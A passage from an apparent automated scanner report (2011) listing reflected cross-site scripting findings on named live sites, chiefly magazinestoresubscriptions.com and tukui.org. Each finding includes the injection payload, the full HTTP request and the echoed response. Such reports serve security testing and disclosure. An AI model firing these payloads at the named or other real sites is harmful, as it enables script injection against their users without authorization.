The value of REST URL parameter 5 is copied into an HTML comment. The payload 3d40d--><a%20b%3dc>2d4dddff1d5 was submitted in the REST URL parameter 5. This input was echoed as 3d40d--><a b=c>2d4dddff1d5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/3d40d--><a%20b%3dc>2d4dddff1d5 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000c56eKoDBu92hjSoELRGTWsr:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:15 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "3d40d--><a b=c>2d4dddff1d5".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.39. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload a27bf--><a%20b%3dc>0a8804d8ed3 was submitted in the REST URL parameter 5. This input was echoed as a27bf--><a b=c>0a8804d8ed3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/a27bf--><a%20b%3dc>0a8804d8ed3 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_WxbAG7s3OJ2_6Fk6JXUju6:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "a27bf--><a b=c>0a8804d8ed3".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.40. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 66710--><a%20b%3dc>39b0edb0aca was submitted in the REST URL parameter 5. This input was echoed as 66710--><a b=c>39b0edb0aca in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/66710--><a%20b%3dc>39b0edb0aca HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004VMIyTRzQ7IDMHnnSCDahJm:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:16 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "66710--><a b=c>39b0edb0aca".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.41. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5ca12--><a%20b%3dc>f6176278517 was submitted in the REST URL parameter 5. This input was echoed as 5ca12--><a b=c>f6176278517 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5ca12--><a%20b%3dc>f6176278517 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:50:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000yWZkyQ2Dmp_a-WXP0Trg51H:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:59:43 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5ca12--><a b=c>f6176278517".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.42. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 5d4f6--><a%20b%3dc>8f3f7215263 was submitted in the REST URL parameter 5. This input was echoed as 5d4f6--><a b=c>8f3f7215263 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/5d4f6--><a%20b%3dc>8f3f7215263 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:18 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000OVEkfbp2STWkegj-zVaEMgL:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:09 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "5d4f6--><a b=c>8f3f7215263".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.43. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 33edf--><a%20b%3dc>9be40c08234 was submitted in the REST URL parameter 5. This input was echoed as 33edf--><a b=c>9be40c08234 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/33edf--><a%20b%3dc>9be40c08234 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:28 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00002mq_okqRHeZ0pVVISJbxdFP:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:08 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "33edf--><a b=c>9be40c08234".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.44. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 38c81--><a%20b%3dc>91da38e0a93 was submitted in the REST URL parameter 5. This input was echoed as 38c81--><a b=c>91da38e0a93 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/38c81--><a%20b%3dc>91da38e0a93 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000I4weEx0LAIj5IojBYDzy4Ts:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:24 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "38c81--><a b=c>91da38e0a93".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.45. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Self

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 64966--><a%20b%3dc>cbecfd5019f was submitted in the REST URL parameter 5. This input was echoed as 64966--><a b=c>cbecfd5019f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/64966--><a%20b%3dc>cbecfd5019f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:59 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00008zxEkjMG8qWSKz4ok6F1JV-:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "64966--><a b=c>cbecfd5019f".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.46. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_TeenVogue [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_TeenVogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 149e3--><a%20b%3dc>58e96b74057 was submitted in the REST URL parameter 5. This input was echoed as 149e3--><a b=c>58e96b74057 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/149e3--><a%20b%3dc>58e96b74057 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:51:52 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rKgo6vzs-36_W-1g5D9HOMp:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:00:49 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "149e3--><a b=c>58e96b74057".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.47. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_VanityFair [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_VanityFair

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload bf9ef--><a%20b%3dc>c4c591cd110 was submitted in the REST URL parameter 5. This input was echoed as bf9ef--><a b=c>c4c591cd110 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/bf9ef--><a%20b%3dc>c4c591cd110 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:04 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tze0kXm3Fg-QcJYB1lWZ5Fy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:44 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "bf9ef--><a b=c>c4c591cd110".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.48. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 9b1a1--><a%20b%3dc>0ebbfb1070a was submitted in the REST URL parameter 5. This input was echoed as 9b1a1--><a b=c>0ebbfb1070a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/9b1a1--><a%20b%3dc>0ebbfb1070a HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ogGL_3HzphLpUVCIwzJaeWD:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "9b1a1--><a b=c>0ebbfb1070a".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.49. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7fa15--><a%20b%3dc>8fe29995466 was submitted in the REST URL parameter 5. This input was echoed as 7fa15--><a b=c>8fe29995466 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7fa15--><a%20b%3dc>8fe29995466 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005RC3xkXmCObYY2VxnCFp0qy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:17 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7fa15--><a b=c>8fe29995466".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.50. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.magazinestoresubscriptions.com
Path:	/webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 299a8--><a%20b%3dc>3a0d0c4b00f was submitted in the REST URL parameter 5. This input was echoed as 299a8--><a b=c>3a0d0c4b00f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/299a8--><a%20b%3dc>3a0d0c4b00f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_Hl8m1yp5arMOjQMe96LPg3:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:39 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329

                                               

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "299a8--><a b=c>3a0d0c4b00f".
       Corrective Action:


                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.51. http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e206'><script>alert(1)</script>589ffe6106c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e206\'><script>alert(1)</script>589ffe6106c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/blog/?6e206'><script>alert(1)</script>589ffe6106c=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/blog/page/2/?6e206\'><script>alert(1)</script>589ffe6106c=1' class='inactive' >
...[SNIP]...

3.52. http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/category/others/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fcd2'><script>alert(1)</script>291a5ab83dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fcd2\'><script>alert(1)</script>291a5ab83dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/category/others/?4fcd2'><script>alert(1)</script>291a5ab83dd=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/category/others/page/2/?4fcd2\'><script>alert(1)</script>291a5ab83dd=1' class='inactive' >
...[SNIP]...

3.53. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
